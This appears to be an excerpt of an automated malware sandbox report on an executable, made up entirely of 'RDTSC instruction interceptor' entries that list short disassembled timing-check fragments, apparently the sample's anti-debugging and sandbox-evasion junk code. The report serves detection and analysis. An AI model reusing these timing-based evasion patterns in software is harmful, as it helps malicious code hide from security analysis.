Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D88AA0 second address: D88AA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D88AA6 second address: D88AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4760DF1536h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D88AB0 second address: D88AB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D88AB4 second address: D88AF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4760DF153Dh 0x00000011 jnl 00007F4760DF155Ch 0x00000017 jmp 00007F4760DF1546h 0x0000001c jmp 00007F4760DF1540h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D88F29 second address: D88F4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F4760DF984Eh 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F4760DF984Eh 0x00000013 jng 00007F4760DF9846h 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D90F75 second address: D90F79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D90F79 second address: D90F83 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4760DF9846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D90F83 second address: D90F89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D90F89 second address: D90F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F4760DF9846h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D912C5 second address: D912E4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4760DF153Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4760DF153Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D912E4 second address: D912E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D912E9 second address: D9130E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F4760DF1536h 0x0000000a jmp 00007F4760DF153Eh 0x0000000f jg 00007F4760DF1536h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D9130E second address: D91312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D91758 second address: D91761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D918D7 second address: D918DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D918DB second address: D918E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D918E1 second address: D918EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D918EA second address: D91903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4760DF153Dh 0x00000009 jbe 00007F4760DF1536h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D92458 second address: D92469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 js 00007F4760DF9876h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D92C14 second address: D92C40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF1543h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F4760DF1540h 0x0000000e pop edx 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D92C40 second address: D92C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F4760DF9846h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: CE29A6 second address: CE29CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F4760DF154Ah 0x00000011 jmp 00007F4760DF1544h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: CE29CB second address: CE29D9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 ja 00007F4760DF9846h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: CE29D9 second address: CE29DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: CE29DD second address: CE29E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D99F60 second address: D99F89 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4760DF1536h 0x00000008 jmp 00007F4760DF1549h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D99F89 second address: D99F8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D99ABA second address: D99ACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 jbe 00007F4760DF154Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D9C26F second address: D9C277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D9DAE4 second address: D9DB01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4760DF153Dh 0x0000000f jp 00007F4760DF1536h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D9DB01 second address: D9DB05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D9DB05 second address: D9DB0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D9DB0B second address: D9DB11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D9DB11 second address: D9DB17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: DAB076 second address: DAB07A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: DB38DA second address: DB38FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF1542h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a ja 00007F4760DF1536h 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: DBF659 second address: DBF65F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: DBF65F second address: DBF663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: DBF663 second address: DBF682 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4760DF9856h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: DBF682 second address: DBF69D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 js 00007F4760DF1536h 0x0000000c jne 00007F4760DF1536h 0x00000012 popad 0x00000013 js 00007F4760DF153Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: DC4849 second address: DC484F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: DC484F second address: DC4855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: DC4855 second address: DC485A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: DC485A second address: DC4864 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4760DF153Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: DC4864 second address: DC4889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F4760DF987Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 jmp 00007F4760DF9855h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: DC4FA3 second address: DC4FB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F4760DF1536h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: DC4FB2 second address: DC4FB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: DC512B second address: DC5131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: DC5BFF second address: DC5C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: DC5C04 second address: DC5C1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F4760DF1542h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: DCDC93 second address: DCDC97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: DCDC97 second address: DCDCA1 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4760DF1536h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: DCDCA1 second address: DCDCA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: DCDCA7 second address: DCDCCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF1545h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: DCDCCB second address: DCDCD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: DCDCD0 second address: DCDCD5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: CDDA8A second address: CDDA8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: CDDA8E second address: CDDAB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4760DF1544h 0x0000000d jo 00007F4760DF1536h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: CDDAB0 second address: CDDAB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: CD1CC7 second address: CD1CCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: DD5D71 second address: DD5D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnc 00007F4760DF9848h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 js 00007F4760DF9846h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: DD5D8E second address: DD5D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: DE8063 second address: DE8067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: DE8067 second address: DE808B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4760DF1536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4760DF1546h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: DE808B second address: DE808F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: DE9CE0 second address: DE9CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: DE9CE6 second address: DE9D00 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4760DF9846h 0x00000008 jmp 00007F4760DF984Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: DE9D00 second address: DE9D06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: DE9D06 second address: DE9D0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: DE9EDF second address: DE9EE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: E01661 second address: E01665 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: E01665 second address: E0166B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: E0166B second address: E0167B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F4760DF9846h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: E00CFB second address: E00D2D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4760DF1548h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4760DF1540h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: E00D2D second address: E00D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: E00D31 second address: E00D3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: E00D3B second address: E00D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: E00D3F second address: E00D43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: E00D43 second address: E00D49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: E01174 second address: E011AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007F4760DF1536h 0x0000000c popad 0x0000000d jmp 00007F4760DF153Dh 0x00000012 jnl 00007F4760DF1544h 0x00000018 popad 0x00000019 push edi 0x0000001a pushad 0x0000001b jnl 00007F4760DF1536h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: E011AD second address: E011C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4760DF9850h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: E02D0C second address: E02D16 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4760DF1536h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: E042B6 second address: E042BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: E042BC second address: E042DD instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4760DF1536h 0x00000008 jmp 00007F4760DF153Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: E042DD second address: E042E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: E05B69 second address: E05B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: E05B6D second address: E05B71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: E07157 second address: E0716D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF153Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F4760DF1536h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: E09A0D second address: E09A2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF9859h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: E09BE9 second address: E09BFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF1540h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: E09CC6 second address: E09D2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF9851h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F4760DF9848h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 push 00000004h 0x00000028 mov dx, 9B21h 0x0000002c call 00007F4760DF9849h 0x00000031 jns 00007F4760DF985Ch 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: E09D2C second address: E09D30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: E09D30 second address: E09D36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: E09D36 second address: E09D50 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4760DF153Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: E09D50 second address: E09D81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jns 00007F4760DF985Dh 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 pushad 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: E09F33 second address: E09F37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: E0B9A4 second address: E0B9A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
